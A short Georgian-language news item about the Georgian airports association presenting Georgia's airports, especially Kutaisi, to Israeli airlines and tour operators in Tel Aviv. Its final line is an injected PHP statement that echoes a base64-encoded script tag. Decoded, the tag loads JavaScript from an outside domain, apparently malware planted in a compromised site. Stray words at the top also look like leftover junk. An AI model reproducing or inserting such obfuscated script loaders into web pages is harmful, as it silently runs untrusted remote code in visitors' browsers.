celsiusi
ავერსი შნაიდერი

საქართველოს აეროპორტების გაერთიანებამ თელ ავივში ავიაკომპანიებისა და ტუროპერატორებისთვის პრეზენტაცია გამართა და საქართველოს საერთაშორისო აეროპორტების პოტენციალი გააცნო. ორ ქვეყანას შორის საჰაერო მიმოსვლის დინამიკის შესაძლებლობებსა და მგზავრთნაკადის გაზრდის პერსპექტივებზე ისრაელელ ბიზნესსექტორს საქართველოს აეროპორტების გაერთიანების საავიაციო ბიზნესგანვითარების მენეჯერი ვაკო ჭილაშვილი ესაუბრა. ისრაელი რიგით მეორე, ქვეყანაა, სადაც ჯამური მგზავრთნაკადი საქართველოს აეროპორტებში ყველაზე დიდია.

„ისრაელი, და ზოგადად, ახლო აღმოსავლეთის ქვეყნები ჩვენთვის ერთ-ერთი პრიორიტეტული მიმართულებაა. თურქეთის შემდეგ, ისრაელი მეორე ქვეყანაა, სადაც ორ ქვეყანას შორის წლიურად ჯამური მგზავრთნაკადი 400 ათასს აჭარბებს. პრეზენტაციისას მიმოვიხილეთ საქართველოს საავიაციო ბაზარი, ვრცლად ვისაუბრეთ ქუთაისის საერთაშორისო აეროპორტზე, ფასდაკლების იმ სპეციალურ პაკეტებზე, რასაც ჩვენ ავიაკომპანიებს ვთავაზობთ. ჩვენი პროგნოზით, ქუთაისი-თელ ავივისა და ქუთაისი-რამონის მიმართულებით ფრენების დაწყების შემთხვევაში, მგზავრთნაკადი საკმაოდ დიდი იქნება,“ – განაცხადა ვაკო ჭილაშვილმა.
ისრაელში პრეზენტაცია ტურიზმის ეროვნული ადმინისტრაციის მიერ იყო ორგანიზებული. ადმინისტრაციის საკონვენციო და საგამოფენო ბიურომ ისრაელის უმსხვილეს ავიაკომპანიებსა და ტუროპერატორებს საქართველოში საქმიანი ტურიზმის პერსპექტივები გააცნო.
 
 
582
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");